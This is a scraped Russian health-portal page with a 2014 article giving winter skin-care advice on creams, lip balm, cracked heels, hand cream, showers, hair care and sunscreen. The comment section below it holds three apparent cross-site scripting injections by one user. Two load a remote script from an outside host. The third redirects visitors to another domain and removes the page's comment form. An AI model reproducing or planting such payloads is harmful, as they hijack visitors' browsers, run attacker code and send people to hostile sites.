Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как заботиться о коже зим...  >>  Как заботиться о коже зимой?
 
Обратная связь
 

Как заботиться о коже зимой?

Размер шрифта
05 декабря 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Зимой вашей коже как никогда нужен тщательный уход и забота. Благодаря достижениям современной дерматологии появилось множество эффективных средств, которые помогут вам сохранить кожу красивой даже в сильный мороз.

Как заботиться о коже зимой

Если вы обычно используете легкий лосьон, зимой стоит попробовать более насыщенный крем, хотя бы для наиболее сухих участков. Чтобы свести к минимуму ощущение жирности, используйте небольшое количество средства, тщательно втирая его в кожу. Увлажнители (глицерин, гиалуроновая кислота и пропиленгликоль) поглощают воду из воздуха. Смягчающие средства, такие как детское или минеральное масло, масло жожоба, вазелин и ланолин, помогают восполнить недостаток жиров в коже. Большинство увлажняющих средств содержит комбинацию этих двух ингредиентов.

И не забывайте об увлажнителе воздуха – ведь теплый и сухой воздух в квартире может сильно усугубить состояние вашей кожи.

Зимой никто не застрахован от сухости губ. Пейте больше воды, чтобы не допустить обезвоживания, а дома пользуйтесь увлажняющим средством. Наносите бальзам для губ или помаду каждый раз, как выходите на улицу. Не проводите слишком много времени на солнце и сильном ветру. И не облизывайте губы – облегчение будет недолгим, а вот состояние ваших губ от этого только ухудшится.

Позаботьтесь о ваших стопах! Болезненные трещины на пятках – довольно частое явление, особенно в зимнее время. В этих трещинах может возникнуть инфекция, к тому же они вызывают боль при ходьбе. Для лечения лучше всего подойдут средства на основе вазелина – нанесите их на стопы, затем оберните их полиэтиленовой пленкой, наденьте носки и оставьте на ночь. Через пару дней вы обязательно заметите улучшение.

Особый уход нужен и коже рук. Ваши руки могут сильно пострадать от холодного зимнего воздуха. Частое мытье рук хоть и помогает в борьбе с бактериями, но лишь усиливает сухость. И даже если вы носите перчатки, руки страдают от холода гораздо больше, чем остальные части вашего тела. Используйте крем для рук на основе глицерина: наносите его утром и вечером, а также при ощущении сухости кожи в течение всего дня.

Другие косметические средства тоже нужно выбирать с умом. Так, зимой вам лучше всего подойдет мыло с высоким содержанием масел. Увлажняющие средства, в состав которых входит диметикон, глицерин, ланолин и минеральное масло, отлично подойдут для сухой кожи.

Удаление омертвевших клеток позволяет увлажняющему средству лучше проникать в кожу и оказывать максимальное действие. Вы можете прибегнуть к очищающим средствам, содержащим молочную или салициловую кислоту. Однако некоторые средства могут повредить сухую кожу, особенно зимой, поэтому лучше сначала опробовать их на небольшом участке. Если же у вас проблемная или очень чувствительная кожа – обратитесь за советом к дерматологу.

Душ поможет дополнительно увлажнить вашу кожу. Однако долгий и очень горячий душ только усугубит ситуацию. Поэтому выбирайте теплую воду – так вы не нарушите жировой баланс кожи. Сразу после душа нанесите на тело увлажняющее средство. Лучше всего подойдут средства с глицерином и гиалуроновой кислотой. Детское или минеральное масло – тоже отличный выбор. 

Защитите от сухости свои волосы! Зимой не стоит мыть голову каждый день – лучше делать это через день, ведь избыток шампуня может лишить ваши волосы влаги. Не забывайте использовать кондиционер и не увлекайтесь укладыванием волос феном и горячей плойкой. И обязательно носите головной убор.

Наконец, не забывайте о защите от солнца. Вы думаете, что зимой получить солнечный ожог невозможно? Ошибаетесь. В группе риска находятся лыжники и другие любители зимних видов спорта – ведь снег отлично отражает солнечный свет. Но даже если вы не собираетесь на склон, вам все же понадобится защита от солнца с SPF 30 или даже больше.

Все эти простые, но в то же время эффективные рекомендации помогут вам сохранить свою кожу красивой и здоровой в течение долгой зимы.

Другие секреты молодости и красоты щедро раскрываются на страницах нашего специального проекта «Хочу быть красивой».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:24

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Супереда против солнечных ожогов   Новогодние подарки для вашей кожи   Что делать с сухой кожей?   Проблемы с красотой после 40, о которых никто вам не рассказывал  
28 декабря 2012Дед Мороз – красный нос: не от холода, а от бактерий 11 сентября 2012Солнечные ожоги снижают риск рака кожи!
 
13 февраля 2012Солнце провоцирует гиперпигментацию 02 августа 2011Виноград защищает от ультрафиолета
 

Слайдшоу

1
Вы неправильно мажете крем
Как пережить поход на пляж?
Что есть зимой для кожи

Тесты

1
Как выявить контактный дерматит?
Профессиональный оценщик кожи
Мифы о прыщах
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.